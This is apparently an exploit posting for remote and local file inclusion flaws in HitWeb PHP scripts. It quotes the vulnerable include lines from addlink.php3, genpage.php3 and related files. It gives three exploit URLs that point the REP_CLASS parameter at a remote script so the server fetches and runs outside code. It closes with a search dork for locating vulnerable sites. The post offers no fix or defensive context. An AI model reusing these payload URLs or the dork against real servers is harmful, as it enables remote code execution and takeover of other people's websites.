#################################
#################################
#Class: Remote|Local File Include Vulnerability
#site:http://www.hitweb.org/
###################################
#Vuln Code
=================addlink.php3================
include "$REP_CLASS/template.inc"
include "$REP_CLASS/class.http_storage".$EXT_PHP ;
include "$REP_CLASS/class.hitweb".$EXT_PHP ;
include "admin/$REP_LANG_ADMIN/$LANG_ADMIN".
include "$REP_INC/lib_database.php3"
==============appreciation.php3===============
include "$REP_CLASS/template.inc"
==============genpage.php3================
include "$REP_INC/lib_database.php3"
============refererpoint.php3================
include "$REP_CLASS/template.inc" #
####################################
£xploit:
http://www.victim.com/[path]/addlink.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/genpage.php3?REP_CLASS=http://DarknesseScript.txt
http://www.victim.com/[path]/refererpoint.php3?REP_CLASS=http://DarknesseScript.txt
#Dork : "Copyright © 1998 - 2004 Brian FRAVAL"
#w£lc0m£ In x0|0x
#by x_w0x
############################################################